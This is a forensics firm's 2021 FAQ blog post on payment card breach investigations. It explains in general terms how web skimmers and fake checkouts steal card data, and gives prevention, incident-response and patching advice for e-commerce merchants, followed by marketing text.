Everything you need to know about Payment Card Forensic Investigations (PFI)

15 July 2021

With changes to the industry and consumer behaviour in the wake of the Covid-19 pandemic, cardholder security is more important now than ever before. The upsurge in online shopping as High Street stores suffered crippling closures meant that cardholder data was being processed digitally at unprecedented levels. It looks like this trend is set to stay, with a survey undertaken by Waitrose revealing that 77 per cent of people now do at least some of their grocery shopping online, compared to 61 per cent a year ago.

The cyber team at IntaForensics have rounded up some of the most frequently asked questions related to PFI investigations, to ensure that you know how to best keep your eCommerce platform secure.

What is a PFI investigation?

The role of a PFI Forensic Investigator is to help establish the occurrence of a cardholder data compromise and work out when and how it may have occurred. PFI investigators play a vital role in the payment card industry and perform investigations to ensure that breaches are as infrequent as possible.

What is the most common malware seen in PCI Forensic Investigations?

The current malware trend in PFI comes in the form of malicious URLs and skimming code. This malware is commonly documented as only a URL address, and is usually ‘hidden in plain sight’. This form of malware would be read by the server, which will call and execute the code hosted at the specified external address.

The URL would usually be located within the database, the page header/footer or the payment page on your server. The malware could then be used to listen and harvest user input, or to present the customer with a fake checkout to harvest data from – both of which we have seen in live PFI cases. An attacker would be able to easily steal your customer’s card details, names and addresses using these methods.

It is common for these to be disguised as legitimate URLs by using domains which are spelt very similar to legitimate domains, e.g. Google Analytics URLs. Because of this, they can be difficult to spot and involve very little coding to be stored on your local server. They are also ever-changing and thus can be difficult for anti-virus solution providers to keep on top of.

How to prevent Malicious URLs affecting your site:

Knowledge is power. Do you know what third party scripts/URLs are in use on your server? Why not document a list of them. Implement a Web Application Firewall (WAF) to monitor for any suspicious traffic. Implement anti-virus solutions to identify any known malicious domains. Implement File Integrity monitoring (FIM) on core files and payment pages to ensure you/your developer are the only ones making the changes. Conduct regular reviews of core database tables to ensure nothing new has been added. Conduct test transactions on your live website and ensure the checkout looks as it should.
Preparation is key and a loss of card data will inevitably be costly. Luckily, IntaForensics have conducted hundreds of investigations and are here to help.

Are fully hosted checkouts as safe as they seem?

Fully hosted checkouts, consisting of iFrame and redirect solutions, are the recommended checkouts to use. The code for these checkouts is hosted by a third party (not on your server), and thus reduces the risk of a breach of your server affecting customer card data. Back in the day, it was very common for attackers to modify payment pages and send card data to email addresses or external addresses. Fully hosted checkouts prevented this type of attack.

However, just like all areas of technology, attacker methods have evolved. Attackers realised they could not modify these checkouts anymore and looked to other avenues. They discovered they could add skimming code to the merchant’s server, in order to listen and harvest user input from iFrame solutions.

Similar to a key logger, malicious code or URLs could be added to core database tables or page footers/headers to listen for input and exfiltrate it. This code would effectively run in the customer’s browser and thus still able to see the card data being entered.

Due to redirect checkouts redirecting customers to an entirely new website, attackers cannot skim from this method. However, they discovered that the pointer to this checkout must be documented on your server and they could add their own checkout into the process (prior to the legitimate checkout). This checkout would be presented to the customer as a legitimate checkout and enable an attack to steal all data entered. This method would usually mean that the website would present the customer with two checkouts consecutively. We have seen attackers add fake error messages to their checkout to explain this and avoid it being highlighted. This malware would also be in the form of a hidden malicious URL or small script.

How to prevent your checkout being breached:

Fully hosted checkouts alone are not enough. You may not be processing card details directly anymore, but your card flow can still be hacked. You must implement security measures to protect the entire card flow and follow the same security steps outlined above to combat malicious URLs.

What do I to do if an incident occurs on my website?

If a customer calls and says their card has been stolen from your website, would you know what to do? Or perhaps you find malware on your web server, what would you do?

Upon identification of a breach within your ecommerce environment, you will need to alert your acquiring bank. With card data potentially at risk from an attacker, your bank will ask you to conduct a PFI investigation to find out what has happened. If you wish to remediate your website environment, you need to ensure you document any changes made and keep copies of any malicious code (before removal) to provide to the PFI for analysis.

Following engagement, the PFI can conduct their analysis and assist in any further remediation required. IntaForensics have conducted hundreds of these investigations and this is a process we will be able to guide you through from end-to-end. We are here to help and support.

How important is it to patch your platform and make sure it’s up-to-date?

Regular platform patching is an essential part of website maintenance. Patching addresses bugs and glitches, but most importantly addresses security holes.

As mandated under PCI DSS, critical patches should be applied within one month of release. Some platforms are well known for being breached as a result of out-of-date applications, where known vulnerabilities have been exploited as they were not addressed by the merchant. For example, many e-commerce merchants are still using Magento 1 which ran out of support in June 2020 and is considered a high-risk platform.

You must ensure any plugins and addons in use are up to date. Some platforms including WordPress are very easy to update, whereas others may need a little more time.

  • Do you know what e-commerce platform is in use on your website?
  • Is your e-commerce platform up to date?
  • Are you still using Magento 1?

Maintaining your patching/versions is something which can easily be managed by checking the official websites on a regular basis. We suggest doing this at least once a month, in addition to making sure any missing patches have been applied and the latest version is in use. There are several open-source tools which can also assist with this.

Another area of importance is making sure that your staff/third parties know who is responsible for this. A little bit of knowledge will assist in you ensuring your third parties are doing what you pay them for, and reduces the risk to your customers data.

What e-commerce platforms are most secure?

We see various e-commerce platforms from our PFI investigations, including Magento, WordPress, OpenCart and bespoke platforms. They are the platforms which your website is built upon and that is publicly accessible on the internet.
The below shows which platforms we have seen in breached e-commerce environments this quarter:

PFI Article Graph



IntaForensics provides a comprehensive range of cyber security services designed to prevent, monitor, and respond to security breaches.

We boast a team of 50 cyber security and digital forensic experts and a growing market presence. Our consultants will be able to assist with all digital forensic investigations, PCI/DSS QSA, PCI/DSS PFI, Cyber Security and Incident Response.

Quality underpins everything we do, and we are proud to be UKAS 17025:2017 accredited and ISO/IEC 27001:2015, ISO 9001:2015 and ISO14001:2015 certified.

To find out more about our services Tel: 0247 77 17780 to speak with a member of our team or fill-in our online contact form

Talk to our consultation team today

Contact Us

I can honestly say that your excellent customer service and communication has made our forensic instructions to you exceptionally easy. I am very conscious of the amount of time I must have taken up with various queries, requests, and then changed requests but you have always been very patient, polite and extremely helpful.

Case Review Manager - Criminal Cases Review Commission